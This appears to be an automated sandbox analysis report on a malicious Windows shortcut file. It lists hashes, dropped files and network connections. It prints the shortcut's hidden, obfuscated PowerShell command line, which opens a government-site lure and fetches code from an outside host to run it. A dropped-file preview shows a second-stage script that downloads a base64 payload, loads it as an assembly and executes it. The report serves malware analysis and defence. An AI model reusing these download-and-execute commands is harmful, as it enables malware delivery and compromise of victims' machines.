Encrypted:	false
SSDEEP:	48:8ooK0d3TvjbH8idAKZdA1oehwiZUklqehly+3:8XK03Pqy
MD5:	62B9373847ED7AD7C00A6C070C0C2D1A
SHA1:	62EDF9913854D9E6CA796790C835F3DB67BF26C6
SHA-256:	783B5CF3FAB32040F523A322DB96568DF8F63CDC6B89CECFC643E6076D5FAA69
SHA-512:	55AB1D7170FB3CA318104179BACC41502F966851BE37BCAE566404E5292A2665F7D002E8D27650DC8B02125756C623A2954A23A719FDF641CACC0EF7FDF8095E
Malicious:	false
Preview:	L..................F.@.. ...$+.,......x.Y...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I>YL.....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>YL.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V>YL.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V>YL............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V>YN............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 15:58:26 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.9928152268187103
Encrypted:	false
SSDEEP:	48:8L0d3TvjbH8idAKZdA1leh/iZUkAQkqehay+2:8L03V9Qny
MD5:	8CD6DCBC443EFC44F138733F876AA8E8
SHA1:	78A3F97916E570384C91EE7A0E7E49E615D0AD6A
SHA-256:	3BA196E2D0C200195EADA0B42985913F980342818390094DB8BBC59BB18A28AB
SHA-512:	95FE3BAC87FD69F7BA5540CC57FD7440C93FDCFDD28C2CE06BD527D5176D9871AF99C8D16AA057C1DC23A344C0A8320CB65B76AC8B019D98A832A7AB82406244
Malicious:	false
Preview:	L..................F.@.. ...$+.,....j.h.Y...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I>YL.....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>YL.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V>YL.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V>YL............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V>YN............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 07:00:51 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.006442133107262
Encrypted:	false
SSDEEP:	48:860d3TvjbH8idAKZdA14t5eh7sFiZUkmgqeh7sMy+BX:8603Vnmy
MD5:	EFE49AF3495DD854F525F26FDA955EF3
SHA1:	B6AAD46B6B119504D48D01BCFF6F924D544A6D27
SHA-256:	D9C08263971E8FFD7C1564E506DDE722A8EF3F3F5D8AFB45E1D8C63FCF68DF60
SHA-512:	9C761C6A92D03F361A66CCC2215A0DF809D333215130089EDEC55EDD84AD7117637FF84C0070F28EE937082D0136AA332346B468DC18FB7D0456560BF5EA2A40
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....C..b...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I>YL.....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>YL.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V>YL.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V>YL............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VEW.@...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 15:58:26 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9937425256524244
Encrypted:	false
SSDEEP:	48:8qK0d3TvjbH8idAKZdA16ehDiZUkwqehey+R:8b03Gky
MD5:	4C7CB5694FEF42E46AEEAA86CA8B892E
SHA1:	A2ECAA1C95ABC9999137514F80B14EEF9C499AB8
SHA-256:	10478794C2A038C7CE776AF2159B852D20BC9EDEBF6B86E54EC027E8DC30A7A8
SHA-512:	B670FDCDEC601308BF7F07E40E298DC0199A44C62875CABB4C26CA2776708C7433E0E213F8D210001D6A3D185EB446E28BE9AF46ABB0E2596206BDF3ED7336FE
Malicious:	false
Preview:	L..................F.@.. ...$+.,......`.Y...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I>YL.....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>YL.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V>YL.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V>YL............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V>YN............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 15:58:26 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9830163484459318
Encrypted:	false
SSDEEP:	48:8V0d3TvjbH8idAKZdA1UehBiZUk1W1qehoy+C:8V03G9Iy
MD5:	16E3EBC74E955F3BD006067D60FFA5E3
SHA1:	53E9BCBD7E27AC749DC5D4B0049FD4DE5A07A43B
SHA-256:	B5226933B52CAB62C88576DCAE2801D68EDC32B537B7A1954D4D32C88CA26D90
SHA-512:	6BB3CF363386DCBC197F7C2CC0627A11E9BC655A3CF1B3247517EBA999153E6AE4ECE6C57251EEBEDF9FF0BF792EA2A8FDD7CDEAEFED5495A0F35CD1442E0329
Malicious:	false
Preview:	L..................F.@.. ...$+.,....5.q.Y...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I>YL.....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>YL.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V>YL.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V>YL............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V>YN............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 15:58:26 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	3.9923420153583473
Encrypted:	false
SSDEEP:	48:8D0d3TvjbH8idAKZdA1duTrehOuTbbiZUk5OjqehOuTbmy+yT+:8D03XTYTbxWOvTbmy7T
MD5:	976108D73A148D835AC8B7DF8360BE85
SHA1:	A1961C50FF59E46C45AAD8B8A897ED1D9E0CF1C0
SHA-256:	3591BF74C07E6660D04D5A308DE613D0DE1EF71828375A7D9685CA963177CE38
SHA-512:	2BABFEF19C2FA08306DECB6DE8EA5748587FDA14423F32BBF4BC58ABD64840F00B04AE6DA1E104EB39D8707FCDB13BBD8B05097B2542DF69F0138AA5D1F127F0
Malicious:	false
Preview:	L..................F.@.. ...$+.,......V.Y...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I>YL.....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>YL.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V>YL.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V>YL............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V>YN............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Chrome Cache Entry: 86

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	527
Entropy (8bit):	4.801811297153848
Encrypted:	false
SSDEEP:	12:J0+ox0UDWsRGDW8hsw4Aox1WR3oKcpRmsXtmIrgvRMKiSQe9uE7F50v+T:yiUDWsYDWus/q3oKcpRTXt+vEHK50v+
MD5:	91B69177B0962BD96D0259982F719C13
SHA1:	2928B4AFCB66355CE9EAEEA22C3B0EEAB451F67A
SHA-256:	AECC7333C5335AA7B28DA1BE8EC4FFB4F64688FE496E17906A7D815024B920B5
SHA-512:	B9215EC5B0AD38C32C05A0805A7AD38483756C5428B1B5033927109980A2A98725BBDB985ECE6BEDA6801305FE627FBFB6B14CA3C6C197FC6866A73A6BD95807
Malicious:	false
URL:	https://pmo.gov.pk/site/404
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>500 Internal Server Error</title>.</head><body>.<h1>Internal Server Error</h1>.<p>The server encountered an internal error or.misconfiguration and was unable to complete.your request.</p>.<p>Please contact the server administrator at . root@localhost to inform them of the time this error occurred,. and the actions you performed just before this error.</p>.<p>More information about this error may be available.in the server error log.</p>.</body></html>.

\Device\ConDrv

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	258
Entropy (8bit):	5.253795032079398
Encrypted:	false
SSDEEP:	6:3P2XIpp+a6LKILbAWKCsu2xKvGz4g1L3ppNaA3gYZzI/HLN9yn:f2XIpUkIX7KC24gd3pjZdZE/rKn
MD5:	3BFC25F8AB082D0F73CA42C0EE83B35E
SHA1:	8CB2DC046512E25D5660C3BC88723886C1B52C0F
SHA-256:	70F613B732D596F69B0871D154466FB5168DA255C451A5E69E31FF65CC6665A0
SHA-512:	C534CD1B47173AE0F5B3690B960A4B0FDC479D3CF12EBA0C319327D4B3F1DB46896175E3848BF02A09266ED6405DE1ABD7FC5E36477AE36AABA680794AE6810A
Malicious:	false
Preview:	$string = irm ('http://ministryofficedownloadcloudserver.screenpont.xyz/78/CKP/'); $bytees = [System.Convert]::FromBase64String($string.Replace('$','')); [System.Reflection.Assembly]::Load($bytees);$Adobe = New-Object DSC.Sign; $Adobe.Connect('CheckLic');..

Static File Info

General

File type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=13, Archive, ctime=Wed Feb 14 17:37:15 2024, mtime=Wed Aug 7 09:15:50 2024, atime=Wed Feb 14 17:37:15 2024, length=455680, window=hidenormalshowminimized
Entropy (8bit):	4.3817665704973665
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	jKSjtQ8W7O.lnk
File size:	2'013 bytes
MD5:	154af2b280309c99ae116841e1db5474
SHA1:	db66323cd296d1571b8c1816c2fbefb474112e5e
SHA256:	ffb1e4d9253ed97cc381826993a8812ac6c53f7a7d01793e282fc148102bdab3
SHA512:	e846204139083b31915c389a8e8ab0d1de5b4daeb5909a8fc2d6ab3b54cd9f43076721a217905c4e26e6225da6335d0ad4bd78bb84252fb34ca12fd8291b353e
SSDEEP:	24:8j+A9JilCQatK3sphWSO0MAbWt+/CWGX6RK4QTPNQTTvS7MReMtYqV8TJZTJpab5:8CaJ5lswLqX6RjvSQReMtBW3rat74
TLSH:	E641882426F61708F5F28B3EA8777221493B7809C935DB8E029D80494B67A11E8B5F3B
File Content Preview:	L..................F.... ....D7.t_.. j........A.t_...............................P.O. .:i.....+00.../C:\...................V.1......X.h..Windows.@........OwH.Y.L...........................~..W.i.n.d.o.w.s.....Z.1......Y.K..System32..B........OwH.Y.L......

File Icon


Icon Hash:	74f4f4dcece9e9ed

Static Windows Shortcut Info

General
Relative Path:	..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command Line Argument:	-noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.ministryof.gov.pk; nslookup www.Elpson.com; nslookup www.mproton.com; start https://pmo.gov.pk/site/404; $did='enpont.xyz/'; &('i'+'r'+'m') http://ministryofficedownloadcloudserver.scre$did/78/\|Powershell
Icon location:	%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 30, 2024 18:58:14.782404900 CEST	49673	443	192.168.2.8	23.206.229.226
Sep 30, 2024 18:58:14.938659906 CEST	49672	443	192.168.2.8	23.206.229.226
Sep 30, 2024 18:58:17.329417944 CEST	49676	443	192.168.2.8	52.182.143.211
Sep 30, 2024 18:58:19.724209070 CEST	80	49707	217.20.57.18	192.168.2.8
Sep 30, 2024 18:58:19.724239111 CEST	80	49707	217.20.57.18	192.168.2.8
Sep 30, 2024 18:58:19.724248886 CEST	80	49707	217.20.57.18	192.168.2.8
Sep 30, 2024 18:58:19.724260092 CEST	80	49707	217.20.57.18	192.168.2.8
Sep 30, 2024 18:58:19.724272013 CEST	80	49707	217.20.57.18	192.168.2.8
Sep 30, 2024 18:58:19.724330902 CEST	49707	80	192.168.2.8	217.20.57.18
Sep 30, 2024 18:58:19.724375963 CEST	49707	80	192.168.2.8	217.20.57.18
Sep 30, 2024 18:58:19.724430084 CEST	80	49707	217.20.57.18	192.168.2.8
Sep 30, 2024 18:58:19.724487066 CEST	49707	80	192.168.2.8	217.20.57.18
Sep 30, 2024 18:58:19.724828005 CEST	80	49707	217.20.57.18	192.168.2.8
Sep 30, 2024 18:58:19.724924088 CEST	49707	80	192.168.2.8	217.20.57.18
Sep 30, 2024 18:58:19.954267979 CEST	49677	80	192.168.2.8	192.229.211.108
Sep 30, 2024 18:58:24.394479990 CEST	49673	443	192.168.2.8	23.206.229.226
Sep 30, 2024 18:58:24.547982931 CEST	49672	443	192.168.2.8	23.206.229.226
Sep 30, 2024 18:58:24.726592064 CEST	49708	80	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:24.733218908 CEST	80	49708	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:24.733288050 CEST	49708	80	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:24.903947115 CEST	49708	80	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:25.074610949 CEST	80	49708	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:25.237471104 CEST	80	49708	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:25.292115927 CEST	49708	80	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:25.307483912 CEST	49712	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:25.307540894 CEST	443	49712	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:25.307601929 CEST	49712	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:25.349230051 CEST	49712	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:25.349266052 CEST	443	49712	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:25.387310982 CEST	49713	443	192.168.2.8	203.101.184.118
Sep 30, 2024 18:58:25.387357950 CEST	443	49713	203.101.184.118	192.168.2.8
Sep 30, 2024 18:58:25.387414932 CEST	49713	443	192.168.2.8	203.101.184.118
Sep 30, 2024 18:58:25.388428926 CEST	49714	443	192.168.2.8	203.101.184.118
Sep 30, 2024 18:58:25.388442039 CEST	443	49714	203.101.184.118	192.168.2.8
Sep 30, 2024 18:58:25.388495922 CEST	49714	443	192.168.2.8	203.101.184.118
Sep 30, 2024 18:58:25.389316082 CEST	49714	443	192.168.2.8	203.101.184.118
Sep 30, 2024 18:58:25.389329910 CEST	443	49714	203.101.184.118	192.168.2.8
Sep 30, 2024 18:58:25.389484882 CEST	49713	443	192.168.2.8	203.101.184.118
Sep 30, 2024 18:58:25.389497995 CEST	443	49713	203.101.184.118	192.168.2.8
Sep 30, 2024 18:58:25.813328981 CEST	443	49712	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:25.814428091 CEST	49712	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:25.822438002 CEST	49712	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:25.822455883 CEST	443	49712	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:25.822896004 CEST	443	49712	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:25.839638948 CEST	49712	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:25.887403011 CEST	443	49712	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:26.265007973 CEST	443	49706	23.206.229.226	192.168.2.8
Sep 30, 2024 18:58:26.265255928 CEST	49706	443	192.168.2.8	23.206.229.226
Sep 30, 2024 18:58:26.317559958 CEST	443	49712	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:26.317653894 CEST	443	49712	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:26.318592072 CEST	49712	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:26.361201048 CEST	49712	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:27.115118027 CEST	443	49713	203.101.184.118	192.168.2.8
Sep 30, 2024 18:58:27.115576029 CEST	443	49713	203.101.184.118	192.168.2.8
Sep 30, 2024 18:58:27.115634918 CEST	49713	443	192.168.2.8	203.101.184.118
Sep 30, 2024 18:58:27.115658045 CEST	443	49713	203.101.184.118	192.168.2.8
Sep 30, 2024 18:58:27.115720987 CEST	443	49713	203.101.184.118	192.168.2.8
Sep 30, 2024 18:58:27.115762949 CEST	49713	443	192.168.2.8	203.101.184.118
Sep 30, 2024 18:58:27.115770102 CEST	443	49713	203.101.184.118	192.168.2.8
Sep 30, 2024 18:58:27.116338968 CEST	443	49713	203.101.184.118	192.168.2.8
Sep 30, 2024 18:58:27.116384983 CEST	49713	443	192.168.2.8	203.101.184.118
Sep 30, 2024 18:58:27.119904995 CEST	443	49713	203.101.184.118	192.168.2.8
Sep 30, 2024 18:58:27.170972109 CEST	49713	443	192.168.2.8	203.101.184.118
Sep 30, 2024 18:58:27.204068899 CEST	443	49713	203.101.184.118	192.168.2.8
Sep 30, 2024 18:58:27.210912943 CEST	49713	443	192.168.2.8	203.101.184.118
Sep 30, 2024 18:58:27.210958004 CEST	443	49713	203.101.184.118	192.168.2.8
Sep 30, 2024 18:58:27.211338997 CEST	49713	443	192.168.2.8	203.101.184.118
Sep 30, 2024 18:58:27.211349964 CEST	443	49713	203.101.184.118	192.168.2.8
Sep 30, 2024 18:58:27.217111111 CEST	49713	443	192.168.2.8	203.101.184.118
Sep 30, 2024 18:58:27.217128992 CEST	443	49713	203.101.184.118	192.168.2.8
Sep 30, 2024 18:58:27.510333061 CEST	443	49713	203.101.184.118	192.168.2.8
Sep 30, 2024 18:58:27.551249027 CEST	49713	443	192.168.2.8	203.101.184.118
Sep 30, 2024 18:58:27.988599062 CEST	443	49713	203.101.184.118	192.168.2.8
Sep 30, 2024 18:58:27.988620043 CEST	443	49713	203.101.184.118	192.168.2.8
Sep 30, 2024 18:58:27.988694906 CEST	49713	443	192.168.2.8	203.101.184.118
Sep 30, 2024 18:58:27.989396095 CEST	49713	443	192.168.2.8	203.101.184.118
Sep 30, 2024 18:58:27.989396095 CEST	49713	443	192.168.2.8	203.101.184.118
Sep 30, 2024 18:58:27.989418983 CEST	443	49713	203.101.184.118	192.168.2.8
Sep 30, 2024 18:58:27.989428997 CEST	443	49713	203.101.184.118	192.168.2.8
Sep 30, 2024 18:58:28.749834061 CEST	49719	443	192.168.2.8	142.250.186.132
Sep 30, 2024 18:58:28.749886990 CEST	443	49719	142.250.186.132	192.168.2.8
Sep 30, 2024 18:58:28.749948025 CEST	49719	443	192.168.2.8	142.250.186.132
Sep 30, 2024 18:58:28.750176907 CEST	49719	443	192.168.2.8	142.250.186.132
Sep 30, 2024 18:58:28.750191927 CEST	443	49719	142.250.186.132	192.168.2.8
Sep 30, 2024 18:58:28.947761059 CEST	49720	80	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:28.952867031 CEST	80	49720	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:28.952956915 CEST	49720	80	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:28.957549095 CEST	49720	80	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:28.962364912 CEST	80	49720	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:29.411638021 CEST	443	49719	142.250.186.132	192.168.2.8
Sep 30, 2024 18:58:29.411875963 CEST	49719	443	192.168.2.8	142.250.186.132
Sep 30, 2024 18:58:29.411902905 CEST	443	49719	142.250.186.132	192.168.2.8
Sep 30, 2024 18:58:29.413018942 CEST	443	49719	142.250.186.132	192.168.2.8
Sep 30, 2024 18:58:29.413067102 CEST	49719	443	192.168.2.8	142.250.186.132
Sep 30, 2024 18:58:29.414371014 CEST	49719	443	192.168.2.8	142.250.186.132
Sep 30, 2024 18:58:29.414437056 CEST	443	49719	142.250.186.132	192.168.2.8
Sep 30, 2024 18:58:29.452848911 CEST	80	49720	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:29.455054045 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:29.455104113 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:29.455173016 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:29.456813097 CEST	49719	443	192.168.2.8	142.250.186.132
Sep 30, 2024 18:58:29.456825972 CEST	443	49719	142.250.186.132	192.168.2.8
Sep 30, 2024 18:58:29.459575891 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:29.459588051 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:29.508698940 CEST	49719	443	192.168.2.8	142.250.186.132
Sep 30, 2024 18:58:29.510165930 CEST	49720	80	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:29.931960106 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:29.932030916 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:29.977736950 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:29.977761984 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:29.978038073 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:29.984658003 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.031405926 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.482490063 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.482544899 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.482563972 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.482587099 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.482614040 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.482620955 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.482640982 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.482652903 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:30.482661009 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:30.482681036 CEST	49722	443	192.168.2.8	188.114.97.3
